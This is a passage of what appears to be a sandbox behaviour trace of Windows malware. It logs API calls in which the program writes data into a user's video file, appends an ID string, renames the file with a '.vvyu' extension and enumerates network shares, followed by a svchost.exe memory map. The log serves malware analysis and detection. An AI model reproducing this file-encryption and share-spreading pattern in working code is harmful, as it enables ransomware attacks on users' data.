lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0198.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0198.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0198.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0198.517] WriteFile (in: hFile=0x52c, lpBuffer=0x2d51778*, nNumberOfBytesToWrite=0x3057, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d51778*, lpNumberOfBytesWritten=0x30ffb14*=0x3057, lpOverlapped=0x0) returned 1 [0198.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d51778 | out: hHeap=0x6a0000) returned 1 [0198.518] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x305c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.518] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0198.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0198.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0198.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0198.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0198.519] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0198.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.520] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.520] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0198.520] CloseHandle (hObject=0x52c) returned 1 [0198.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b578 [0198.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8d0) returned 0x2d3a670 [0198.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b578 | out: hHeap=0x6a0000) returned 1 [0198.522] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\WE9tZKhSpB.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\we9tzkhspb.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\WE9tZKhSpB.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\we9tzkhspb.mp4.vvyu")) returned 1 [0198.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0198.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.663] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0198.666] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3db227a0, ftCreationTime.dwHighDateTime=0x1d8a5e1, ftLastAccessTime.dwLowDateTime=0x95f6a3a0, ftLastAccessTime.dwHighDateTime=0x1d8a690, ftLastWriteTime.dwLowDateTime=0x95f6a3a0, ftLastWriteTime.dwHighDateTime=0x1d8a690, nFileSizeHigh=0x0, nFileSizeLow=0x305c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WE9tZKhSpB.mp4", cAlternateFileName="WE9TZK~1.MP4")) returned 0 [0198.666] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0198.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0198.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49848 | out: hHeap=0x6a0000) returned 1 [0198.667] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0198.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0198.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49900 | out: hHeap=0x6a0000) returned 1 [0198.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cbf990 | out: hHeap=0x6a0000) returned 1 [0198.668] SendMessageW (hWnd=0x3013e, Msg=0x8003, wParam=0x0, lParam=0x0) returned 0x0 [0198.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d15d38 | out: hHeap=0x6a0000) returned 1 [0198.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b38 | out: hHeap=0x6a0000) returned 1 [0198.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdc28 | out: hHeap=0x6a0000) returned 1 Thread: id = 174 os_tid = 0x1c8 [0172.994] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x31ffee0 | out: lphEnum=0x31ffee0*=0x2cbf990) returned 0x0 [0173.052] WNetEnumResourceW (in: hEnum=0x2cbf990, lpcCount=0x31ffedc, lpBuffer=0x2d22378, lpBufferSize=0x31ffed8 | out: lpcCount=0x31ffedc, lpBuffer=0x2d22378, lpBufferSize=0x31ffed8) returned 0x0 [0173.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f000 [0173.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f048 [0173.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0173.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f090 [0173.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f0d8 [0173.052] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2d22378, lphEnum=0x31ffe28 | out: lphEnum=0x31ffe28*=0x6c6288) returned 0x0 [0173.063] WNetEnumResourceW (in: hEnum=0x6c6288, lpcCount=0x31ffe24, lpBuffer=0x2d283c0, lpBufferSize=0x31ffe20 | out: lpcCount=0x31ffe24, lpBuffer=0x2d283c0, lpBufferSize=0x31ffe20) returned 0x103 [0173.063] WNetCloseEnum (hEnum=0x6c6288) returned 0x0 [0173.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f048 | out: hHeap=0x6a0000) returned 1 [0173.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f000 | out: hHeap=0x6a0000) returned 1 [0173.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f000 [0173.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f048 [0173.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe0) returned 0x6dc668 [0173.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f120 [0173.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f168 [0173.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f0d8 | out: hHeap=0x6a0000) returned 1 [0173.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f090 | out: hHeap=0x6a0000) returned 1 [0173.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0173.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f090 [0173.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f0d8 [0173.066] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2d22398, lphEnum=0x31ffe28 | out: lphEnum=0x31ffe28*=0x31ffe44) returned 0x4b8 [0194.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f048 | out: hHeap=0x6a0000) returned 1 [0194.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f000 | out: hHeap=0x6a0000) returned 1 [0194.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x150) returned 0x6d5c88 [0194.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f000 [0194.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f048 [0194.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42538 [0194.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42580 [0194.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f168 | out: hHeap=0x6a0000) returned 1 [0194.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f120 | out: hHeap=0x6a0000) returned 1 [0194.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f0d8 | out: hHeap=0x6a0000) returned 1 [0194.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f090 | out: hHeap=0x6a0000) returned 1 [0194.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc668 | out: hHeap=0x6a0000) returned 1 [0194.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0194.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0194.821] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2d223b8, lphEnum=0x31ffe28 | out: lphEnum=0x31ffe28*=0x31ffe44) returned 0x4c6 [0194.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.827] WNetEnumResourceW (in: hEnum=0x2cbf990, lpcCount=0x31ffedc, lpBuffer=0x2d22378, lpBufferSize=0x31ffed8 | out: lpcCount=0x31ffedc, lpBuffer=0x2d22378, lpBufferSize=0x31ffed8) returned 0x103 [0194.827] WNetCloseEnum (hEnum=0x2cbf990) returned 0x0 [0194.827] SendMessageW (hWnd=0x3013e, Msg=0x8004, wParam=0x0, lParam=0x0) returned 0x0 Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1a138000" os_pid = "0x358" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x1b4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde3" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2009 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2010 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2011 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2012 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2013 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2014 start_va = 0xc0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2015 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2016 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2017 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2018 start_va = 0x1f0000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2019 start_va = 0x270000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 2020 start_va = 0x2f0000 end_va = 0x2f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 2021 start_va = 0x300000 end_va = 0x300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 2022 start_va = 0x310000 end_va = 0x31afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 2023 start_va = 0x320000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 2024 start_va = 0x420000 end_va = 0x5a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2025 start_va = 0x5b0000 end_va = 0x5bcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2026 start_va = 0x5c0000 end_va = 0x5c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 2027 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2028 start_va = 0x5e0000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 2029 start_va = 0x770000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 2030 start_va = 0x830000 end_va = 0x839fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 2031 start_va = 0x840000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 2032 start_va = 0x850000 end_va = 0x851fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 2033 start_va = 0x860000 end_va = 0x863fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2034 start_va = 0x870000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 2035 start_va = 0x8f0000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 2036 start_va = 0x970000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 2037 start_va = 0x9f0000 end_va = 0x9f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 2038 start_va = 0xa00000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 2039 start_va = 0xa80000 end_va = 0xd4efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2040 start_va = 0xd50000 end_va = 0xd7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 2041 start_va = 0xd80000 end_va = 0xd83fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2042 start_va = 0xd90000 end_va = 0xd9dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 2043 start_va = 0xda0000 end_va = 0xda7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 2044 start_va = 0xdb0000 end_va = 0xdb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 2045 start_va = 0xdc0000 end_va = 0xe3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 2046 start_va = 0xe50000 end_va = 0xecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 2047 start_va = 0xed0000 end_va = 0xeebfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 2048 start_va = 0xf00000 end_va = 0xf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 2049 start_va = 0xf20000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 2050 start_va = 0xfb0000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 2051 start_va = 0x1030000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 2052 start_va = 0x10e0000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 2053 start_va = 0x1190000 end_va = 0x120ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 2054 start_va = 0x1210000 end_va = 0x128ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 2055 start_va = 0x1290000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001290000" filename = "" Region: id = 2056 start_va = 0x12a0000 end_va = 0x1305fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 2057 start_va = 0x1310000 end_va = 0x138ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 2058 start_va = 0x13b0000 end_va = 0x142ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 2059 start_va = 0x1430000 end_va = 0x14affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 2060 start_va = 0x1510000 end_va = 0x158ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 2061 start_va = 0x15b0000 end_va = 0x162ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015b0000" filename = "" Region: id = 2062 start_va = 0x1640000 end_va = 0x16bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 2063 start_va = 0x16c0000 end_va = 0x173ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 2064 start_va = 0x1750000 end_va = 0x17cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 2065 start_va = 0x17d0000 end_va = 0x18cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017d0000" filename = "" Region: id = 2066 start_va = 0x18d0000 end_va = 0x194ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018d0000" filename = "" Region: id = 2067 start_va = 0x1970000 end_va = 0x19effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001970000" filename = "" Region: id = 2068 start_va = 0x1a10000 end_va = 0x1a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a10000" filename = "" Region: id = 2069 start_va = 0x1ab0000 end_va = 0x1b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 2070 start_va = 0x1b30000 end_va = 0x1baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 2071 start_va = 0x1c20000 end_va = 0x1c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 2072 start_va = 0x1d10000 end_va = 0x1d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 2073 start_va = 0x1dc0000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 2074 start_va = 0x1e50000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2075 start_va = 0x1ed0000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 2076 start_va = 0x1f60000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 2077 start_va = 0x2030000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 2078 start_va = 0x2040000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2079 start_va = 0x2100000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 2080 start_va = 0x2180000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 2081 start_va = 0x2200000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2082 start_va = 0x2280000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002280000" filename = "" Region: id = 2083 start_va = 0x2390000 end_va = 0x240ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 2084 start_va = 0x2420000 end_va = 0x249ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 2085 start_va = 0x24a0000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 2086 start_va = 0x25a0000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 2087 start_va = 0x2640000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 2088 start_va = 0x2650000 end_va = 0x274ffff monitored = 1 entry_point = 